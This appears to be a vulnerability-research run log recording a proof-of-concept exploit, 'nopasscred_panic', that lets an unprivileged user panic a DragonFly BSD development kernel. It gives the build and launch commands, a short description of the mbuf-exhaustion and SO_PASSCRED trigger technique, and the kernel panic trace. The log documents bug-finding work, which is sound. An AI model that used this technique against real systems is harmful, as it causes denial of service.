DF-0011 / run.log
DF-0011 — decisive run record (nopasscred_panic). Run as unprivileged user maxx (uid 1001). Guest: DragonFly 6.5-DEVELOPMENT (v6.5.0.1712.g89e6a-DEVELOPMENT, built Mon Jun 29 14:18:01 UTC 2026). NOTE: this PoC panics the guest, so the program's own stderr (trigger.out on the guest filesystem) is lost when the kernel drops to DDB and the snapshot is reverted. The proof of the panic is the serial-console excerpt in panic.txt (dfbsd-qemu/boot.log), reproduced here. The run was reproduced twice from independent fresh `vm.sh reset` boots with an identical signature. ===== build (fresh guest, DF-0011/build.log) ===== $ cd poc/DF-0011 && cc -o nopasscred_panic nopasscred_panic.c -lpthread BUILD_EXIT=0 -rwxr-xr-x 1 maxx maxx 10384 Jul 2 00:38 nopasscred_panic ===== launch (unprivileged, detached) ===== $ (./nopasscred_panic > trigger.out 2>&1 &) ; echo launched launched (program ramps plain-mbuf pressure via SCM_CREDS-bearing SOCK_DGRAM datagrams held open across many socketpairs, while a trigger thread continuously fires no-control SO_PASSCRED sends; ~44s after launch the guest becomes unresponsive to ssh.) ===== serial console (dfbsd-qemu/boot.log) — the panic ===== login: Warning: objcache(mbuf) exhausted on cpu0! Warning: objcache(mbuf) exhausted on cpu1! Fatal user address access from kernel mode from nopasscred_panic at ffffffff806cdac1 Fatal trap 12: page fault while in kernel mode cpuid = 1; lapic id = 1 fault virtual address = 0x10 fault code = supervisor read data, page not present instruction pointer = 0x8:0xffffffff806cdac1 stack pointer = 0x10:0xfffff800ab5d3568 frame pointer = 0x10:0xfffff800ab5d35a8 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, long 0, def32 0, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 1468 current thread = pri 6 kernel: type 12 trap, code=0 CPU1 stopping CPUs: 0x00000001 stopped Stopped at unp_internalize.isra.12+0x11: movq 0x10(%rdi),%rbx db> ===== result ===== status = reproduced (panic). Impact = denial of service. Guest reset afterwards to recover.